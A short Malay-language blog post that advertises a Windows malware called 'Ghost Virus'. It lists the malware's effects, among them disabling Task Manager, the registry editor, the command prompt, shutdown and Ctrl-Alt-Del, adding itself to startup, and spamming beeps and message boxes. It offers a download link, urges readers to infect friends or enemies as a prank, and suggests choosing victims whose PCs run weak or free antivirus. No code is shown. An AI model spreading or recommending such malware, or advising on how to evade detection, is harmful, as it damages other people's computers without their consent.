Ghost Virus

Hari ni terasa malas sikit nak tulis panjang-panjang lebar..
jadi hari ni aku cuma bagi korang semua link untuk muat turun VIRUS yang sangat dahsyat kesannya kepada komputer..antara 'kedahsyatan' perbuatan virus ini ialah:



* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable 'taskkill'
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt




Nak remove macam mana? PAKAI ANTIVIRUS LA..heheheh..
nak remove dengan mudah tekan 'P' lama-lama..
(ni berdasarkan kepada sumber yang aku perolehi la..kalau tak jadi jangan marah aku pulak...)


so kepada semua yang nak sakat kawan-kawan atau lawan-lawan tu, haaaa....pegi muat turun kat sini:



Ghost Virus (Klik di sini)



Jadi macam mana plak kalau virus ni awal-awal lagi dah terdeteksi?
hmmm...setakat ni, aku dah muat turun dan belum sempat virus tu nak buat apa-apa, dah kena 'tangkap' dengan ESET SMART SECURITY 4 yang aku pakai sekarang..jadi pihak pengkaji dari dalam LAB NOD32 dah masukkan Ghost Virus ke dalam Virus Definition Smart Security ni..apa yang aku tau, korang pun kalau nak sakat, cari la yang PC dah tentu-tentu lemau, antivirus pun versi percuma..heheheh..


apa-apa pun cuba aje la heh!





Powered by Blogger.